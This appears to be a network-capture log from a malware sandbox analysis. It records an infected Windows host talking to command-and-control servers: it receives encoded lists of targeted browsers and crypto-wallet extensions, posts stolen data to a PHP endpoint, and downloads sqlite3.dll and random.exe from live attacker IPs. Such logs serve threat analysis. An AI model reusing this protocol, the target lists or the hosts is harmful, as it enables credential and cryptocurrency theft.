Dec 19, 2024 10:10:30.558403969 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:30 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 19, 2024 10:10:30.558439970 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 19, 2024 10:10:30.559784889 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="message"plugins------AKJDGIEHCAEHIEBFBKKK--
Dec 19, 2024 10:10:31.004004955 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:30 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 19, 2024 10:10:31.004034996 CET	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Dec 19, 2024 10:10:31.004144907 CET	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Dec 19, 2024 10:10:31.004215002 CET	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
Dec 19, 2024 10:10:31.004247904 CET	1236	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Dec 19, 2024 10:10:31.004350901 CET	1236	IN	Data Raw: 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 77 78 66 44 42 38 4d 48 78 61 62 32 Data Ascii: a2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnB
Dec 19, 2024 10:10:31.012512922 CET	1040	IN	Data Raw: 4d 58 77 77 66 44 42 38 51 32 39 74 63 47 46 7a 63 79 42 58 59 57 78 73 5a 58 51 67 5a 6d 39 79 49 46 4e 6c 61 58 78 68 62 6d 39 72 5a 32 31 77 61 47 35 6a 63 47 56 72 61 32 68 6a 62 47 31 70 62 6d 64 77 61 57 31 71 62 57 4e 76 62 32 6c 6d 59 6e Data Ascii: MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20
Dec 19, 2024 10:10:31.014271975 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="message"fplugins------IDBKKKKKFBGDGDHIDBGH--
Dec 19, 2024 10:10:31.458396912 CET	335	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 19, 2024 10:10:31.474912882 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII Host: 185.215.113.206 Content-Length: 5291 Connection: Keep-Alive Cache-Control: no-cache
Dec 19, 2024 10:10:31.474946976 CET	5291	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 Data Ascii: ------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 19, 2024 10:10:33.298924923 CET	202	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 19, 2024 10:10:33.568969011 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 19, 2024 10:10:34.010826111 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:10:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 19, 2024 10:10:34.010864019 CET	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 19, 2024 10:10:34.013309002 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49910	185.215.113.16	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:28.495560884 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 19, 2024 10:10:30.109616041 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:29 GMT Content-Type: application/octet-stream Content-Length: 967680 Last-Modified: Thu, 19 Dec 2024 08:25:38 GMT Connection: keep-alive ETag: "6763d882-ec400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 73 d8 63 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 14 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELscg"w@ m1@@@d\|@Xu4@.text `.rdata@@.datalpH@.rsrcX@Z@@.relocuvN@B
Dec 19, 2024 10:10:30.109657049 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 19, 2024 10:10:30.109689951 CET	448	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 19, 2024 10:10:30.109725952 CET	1236	IN	Data Raw: e8 2d 82 00 00 8d 8f d0 fc ff ff e8 9d 02 00 00 8b 8f c4 fc ff ff 85 c9 0f 85 d9 0f 04 00 89 9f cc fc ff ff 8b 8f b8 fc ff ff 85 c9 0f 85 d9 0f 04 00 8d 8f 6c fc ff ff 89 9f c0 fc ff ff e8 ef 81 00 00 8d 8f 5c fc ff ff e8 e4 81 00 00 8d 8f 4c fc Data Ascii: -l\L_^[`t#05MI`tQF;dfqQVW3N>5N$-N4sPN`kPj
Dec 19, 2024 10:10:30.109833002 CET	1236	IN	Data Raw: 08 88 51 10 89 51 14 88 51 18 89 41 2c 8b c1 89 51 20 89 51 28 88 51 30 c3 56 8b f1 83 26 00 8d 4e 08 e8 57 00 00 00 8d 8e 8c 00 00 00 e8 fe 8d 00 00 8d 8e 9c 00 00 00 e8 f3 8d 00 00 8d 8e ac 00 00 00 e8 e8 8d 00 00 8d 8e bc 00 00 00 e8 dd 8d 00 Data Ascii: QQQA,Q Q(Q0V&NW LjE$\|I IF^jAZ @uSV5I3WjXSGfG____j[GSjG)ShG&ShG'SjG(SjG$
Dec 19, 2024 10:10:30.109869003 CET	1236	IN	Data Raw: 57 8a d3 8b 0e 8d 79 01 51 89 3e e8 9c 07 00 00 85 c0 74 1c 89 0d 28 15 4d 00 8b 40 04 8b 00 66 39 58 08 75 05 83 38 21 74 0f 8b cf 84 d2 74 d5 5f 5e 33 c0 5b 5d c2 04 00 b2 01 eb ed 55 8b ec 83 ec 1c 33 d2 42 53 56 57 8b c2 50 8d 50 01 89 55 fc Data Ascii: WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4AEAEARUE{lMG3+DfxGuB
Dec 19, 2024 10:10:30.109905958 CET	1236	IN	Data Raw: 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 1d 05 04 00 83 6d b4 01 0f 85 4d 05 04 00 eb 10 8b 45 b4 40 89 45 b4 83 f8 01 0f 8f 30 05 04 00 ff 75 e8 8b 5d fc ff 75 f4 8b 45 f8 ff 75 e4 ff 75 e0 53 50 ff 75 f0 57 e8 0f 04 00 00 85 c0 0f 89 08 ff ff ff Data Ascii: AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl
Dec 19, 2024 10:10:30.109940052 CET	296	IN	Data Raw: 6a 04 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 4c d4 01 00 8b 3e 33 d2 59 8b 4e 0c 89 46 08 85 c9 7e 11 8b 46 08 89 3c 90 42 8b 4e 0c 8b 7f 24 3b d1 7c ef 53 8d 41 ff 32 db 33 ff 85 c0 7e 2c 8b 46 08 8b 0c b8 8b d1 8b 44 b8 04 89 4d f4 8b c8 89 45 f8 Data Ascii: jZQL>3YNF~F<BN$;\|SA23~,FDMEuNGA;\|u[_FMFMLU,SVWL$(D$83Ph\$\$(ID$PuIM3#MG;
